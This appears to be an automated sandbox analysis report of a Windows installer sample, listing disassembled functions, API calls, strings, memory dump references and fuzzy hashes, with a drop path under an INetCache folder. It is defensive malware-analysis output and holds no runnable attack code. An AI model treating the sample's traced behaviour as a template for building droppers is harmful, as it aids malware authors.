AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054ED
GetWindowRect.USER32(?,000000FF), ref: 0040550D
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405526
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405562
OpenClipboard.USER32(00000000), ref: 00405572
EmptyClipboard.USER32 ref: 00405578
GlobalAlloc.KERNEL32(00000042,?), ref: 00405581
GlobalLock.KERNEL32(00000000), ref: 0040558B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040559F
GlobalUnlock.KERNEL32(00000000), ref: 004055B8
SetClipboardData.USER32(00000001,00000000), ref: 004055C3
CloseClipboard.USER32 ref: 004055C9

Strings

indfrselsartikel Setup: Installing, xrefs: 0040553E

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: indfrselsartikel Setup: Installing
API String ID: 590372296-1446409084
Opcode ID: bd05f583e1d858ca64e0ebc0ccb0213cdf64d916f2755f86f6f3f2ff8d205a57
Instruction ID: e0dc4773203ce2f112709eab9a11bfc184f4d069c8d5349c47d5b80479340f4b
Opcode Fuzzy Hash: bd05f583e1d858ca64e0ebc0ccb0213cdf64d916f2755f86f6f3f2ff8d205a57
Instruction Fuzzy Hash: 10A148B1900208BFDF119F60DD89AAE7BB9FB48355F00407AFA01B61A0C7B55E51DF69

Function 00405F19 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00405148,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000), ref: 00405FCA
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406045
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00406058
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406094
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 004060A2
CoTaskMemFree.OLE32(00000000), ref: 004060AD
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060CF
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00405148,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000), ref: 00406121

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll, xrefs: 00405F48
Call, xrefs: 00405F40, 00406012, 0040602F, 00406044, 00406057, 00406073, 0040609E, 004060CE, 004060D4, 004060EC, 004060FF, 0040611A, 00406120, 0040612B, 00406155
/7r, xrefs: 00405F26
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406014
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060C9

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: /7r$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-164848054
Opcode ID: 91bdcf4667245f18d3d7c7fe1ddc958c0af6ea5d13b0ad944f7f20b056a88a1b
Instruction ID: 17f1afa1df4653d6aa239bb2462815deac18f6a32033811d9d8cd7bf3bfa2e02
Opcode Fuzzy Hash: 91bdcf4667245f18d3d7c7fe1ddc958c0af6ea5d13b0ad944f7f20b056a88a1b
Instruction Fuzzy Hash: 68613671A00111AEDF209F24CC84BBF3BA8EB45314F12813BE942BA2D1D77D4962DB5E

Function 00405799 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,75923410,75922EE0,00000000), ref: 004057C2
lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040580A
lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040582B
lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405831
FindFirstFileA.KERNELBASE(00420D38,?,?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405842
FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058EF
FindClose.KERNEL32(00000000), ref: 00405900

Strings

8B, xrefs: 004057F2
\*.*, xrefs: 00405804
"C:\Users\user\Desktop\ODjwCjQBAP.exe", xrefs: 00405799

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\ODjwCjQBAP.exe"$8B$\*.*
API String ID: 2035342205-2968919530
Opcode ID: cfe99db393b1e675a819fff40dd9f0895a0815041bfdd0424623d1025dab5344
Instruction ID: 8d03ba635bdf6d692437a4f2007131f6bbb84493a6188974bf12e3b4770be62e
Opcode Fuzzy Hash: cfe99db393b1e675a819fff40dd9f0895a0815041bfdd0424623d1025dab5344
Instruction Fuzzy Hash: 3E51AF71900A14EADF217B618C49BAF7AB8DF42724F14807BF850762D2D73C8992DE6D

Function 004020CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme, xrefs: 0040218C

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme
API String ID: 123533781-139713324
Opcode ID: f23b3e070ea651c53f475647926b923c96bbc9cd24cd4c0868bd15dc3a0dd132
Instruction ID: 13bc962cd5a1e0844f107594f4b7cb0b9a1bacf2988c66099de3663f442cfceb
Opcode Fuzzy Hash: f23b3e070ea651c53f475647926b923c96bbc9cd24cd4c0868bd15dc3a0dd132
Instruction Fuzzy Hash: 5A5107B5E00208BFCB00DFE4C988A9DBBB6EF48314F2445AAF515FB2D1DA799941CB54

Function 00406542 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
Instruction ID: 395035d2fa7d2bfd2a07fc8d885f942395c55dc3dc65efbd6096f39d55049081
Opcode Fuzzy Hash: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
Instruction Fuzzy Hash: 18F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96DF44

Function 004061FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(75923410,00421580,C:\,00405A9A,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0), ref: 00406206
FindClose.KERNEL32(00000000), ref: 00406212

Strings

C:\, xrefs: 004061FB

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
Instruction ID: 9db82b8fa8063fa17328456ed946e1162a1eeecbf7bffbc6415ee5c88b4ce2a6
Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
Instruction Fuzzy Hash: 6FD0133555D02057C30027746C0C44779545F653307124B77F456F52F0D3345C7245DD

Function 0040270B Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040271A

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e9e1605c35cf92ad64c5223491071bd3b38123b796805ea0b055523b80a06de9
Instruction ID: 73f39e672a50c1adebb7c94b7850a11d736dff73d217dd7b8340578855458d28
Opcode Fuzzy Hash: e9e1605c35cf92ad64c5223491071bd3b38123b796805ea0b055523b80a06de9
Instruction Fuzzy Hash: 2CF02772604004AAC700EB6499089EEB778DB15324F60007BF180B20C0C7B84A429B2A

Function 00403C09 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C45
ShowWindow.USER32(?), ref: 00403C62
DestroyWindow.USER32 ref: 00403C76
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C92
GetDlgItem.USER32(?,?), ref: 00403CB3
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC7
IsWindowEnabled.USER32(00000000), ref: 00403CCE
GetDlgItem.USER32(?,00000001), ref: 00403D7C
GetDlgItem.USER32(?,00000002), ref: 00403D86
SetClassLongA.USER32(?,000000F2,?), ref: 00403DA0
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403DF1
GetDlgItem.USER32(?,00000003), ref: 00403E97
ShowWindow.USER32(00000000,?), ref: 00403EB8
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403ECA
EnableWindow.USER32(?,?), ref: 00403EE5
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFB
EnableMenuItem.USER32(00000000), ref: 00403F02
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F1A
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F2D
lstrlenA.KERNEL32(indfrselsartikel Setup: Installing,?,indfrselsartikel Setup: Installing,00422F20), ref: 00403F56
SetWindowTextA.USER32(?,indfrselsartikel Setup: Installing), ref: 00403F65
ShowWindow.USER32(?,0000000A), ref: 00404099

Strings

indfrselsartikel Setup: Installing, xrefs: 00403F42, 00403F4C, 00403F55, 00403F63

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: indfrselsartikel Setup: Installing
API String ID: 3282139019-1446409084
Opcode ID: bcb4864de90c51be376c5c7d5e0fb192880a71d4046b15d718494db90bb2b626
Instruction ID: 2eb83949b6bd8974722fa043abbaf2d62199bae10e2b8edc7fb886fd11b27e7e
Opcode Fuzzy Hash: bcb4864de90c51be376c5c7d5e0fb192880a71d4046b15d718494db90bb2b626
Instruction Fuzzy Hash: 3EC1F2B1604201BBDB20AF61EE84E2B3ABCFB84305F51053EF611B11E1C7799842EB5E

Function 00403877 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD

lstrcatA.KERNEL32(1033,indfrselsartikel Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,indfrselsartikel Setup: Installing,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ODjwCjQBAP.exe",00000000), ref: 004038F2
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously,1033,indfrselsartikel Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,indfrselsartikel Setup: Installing,00000000,00000002,75923410), ref: 00403967
lstrcmpiA.KERNEL32(?,.exe), ref: 0040397A
GetFileAttributesA.KERNEL32(Call), ref: 00403985
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously), ref: 004039CE

Part of subcall function 00405E55: wsprintfA.USER32 ref: 00405E62

RegisterClassA.USER32(00422EC0), ref: 00403A0B
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A23
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A58
ShowWindow.USER32(00000005,00000000), ref: 00403A8E
GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403ABA
GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403AC7
RegisterClassA.USER32(00422EC0), ref: 00403AD0
DialogBoxParamA.USER32(?,00000000,00403C09,00000000), ref: 00403AEF

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously, xrefs: 00403901, 00403909, 004039A1, 004039A7, 004039B7
RichEd32, xrefs: 00403AA2
indfrselsartikel Setup: Installing, xrefs: 004038A3, 004038A9, 004038CE, 004038D7, 004038EC
Control Panel\Desktop\ResourceLocale, xrefs: 004038AB
1033, xrefs: 00403897, 004038ED
C:\Users\user\AppData\Local\Temp\, xrefs: 0040387C
.exe, xrefs: 00403974
RichEdit, xrefs: 00403AC1
RichEdit20A, xrefs: 00403AB2, 00403AB8
Call, xrefs: 00403935, 0040393D, 0040394A, 00403994, 0040399A
.DEFAULT\Control Panel\International, xrefs: 004038DD
_Nb, xrefs: 004039EA, 00403A52
RichEd20, xrefs: 00403A94
"C:\Users\user\Desktop\ODjwCjQBAP.exe", xrefs: 0040387B

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\ODjwCjQBAP.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$indfrselsartikel Setup: Installing
API String ID: 1975747703-4127912393
Opcode ID: b5acaa8937ced472a66d3687a921226f39372a12dbbf564bd8eff0e0bc24d963
Instruction ID: 29345e8072be8e75dc90901d6125d60d13300850aec60374d900494af90ecb47
Opcode Fuzzy Hash: b5acaa8937ced472a66d3687a921226f39372a12dbbf564bd8eff0e0bc24d963
Instruction Fuzzy Hash: 8161A4B06442407ED620AF65AD45F373A6CEB8474AF40447FF945B22E2C6BCAD029A3D

Function 00402D4A Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D5E
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ODjwCjQBAP.exe,00000400), ref: 00402D7A

Part of subcall function 00405B6A: GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\ODjwCjQBAP.exe,80000000,00000003), ref: 00405B6E
Part of subcall function 00405B6A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ODjwCjQBAP.exe,C:\Users\user\Desktop\ODjwCjQBAP.exe,80000000,00000003), ref: 00402DC3
GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402F0A

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FA1
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D54, 00402F22
z(, xrefs: 00402FCF
Error launching installer, xrefs: 00402D9A
Inst, xrefs: 00402E31
C:\Users\user\Desktop\ODjwCjQBAP.exe, xrefs: 00402D64, 00402D73, 00402D87, 00402DA4
Null, xrefs: 00402E43
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402F53
soft, xrefs: 00402E3A
"C:\Users\user\Desktop\ODjwCjQBAP.exe", xrefs: 00402D4A
C:\Users\user\Desktop, xrefs: 00402DA5, 00402DAA, 00402DB0

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\ODjwCjQBAP.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ODjwCjQBAP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$z(
API String ID: 2803837635-261072672
Opcode ID: e5ab56cf196d26c18991739aeee88d59d7819f5e2225516add2df55f48501880
Instruction ID: 1e54d23c6bd4663b885b54a46d63d50a2b02afe17d1d0705d7bda66adc4b1b0c
Opcode Fuzzy Hash: e5ab56cf196d26c18991739aeee88d59d7819f5e2225516add2df55f48501880
Instruction Fuzzy Hash: 6661E5B1A40215ABDF20AF64DE89A9E76B8EB04355F11413FF904B72C1C7BC9D418B9C

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405EF7: lstrcpynA.KERNEL32(?,?,00000400,0040336D,00422F20,NSIS Error), ref: 00405F04

Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll), ref: 0040517E
Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme, xrefs: 00401786
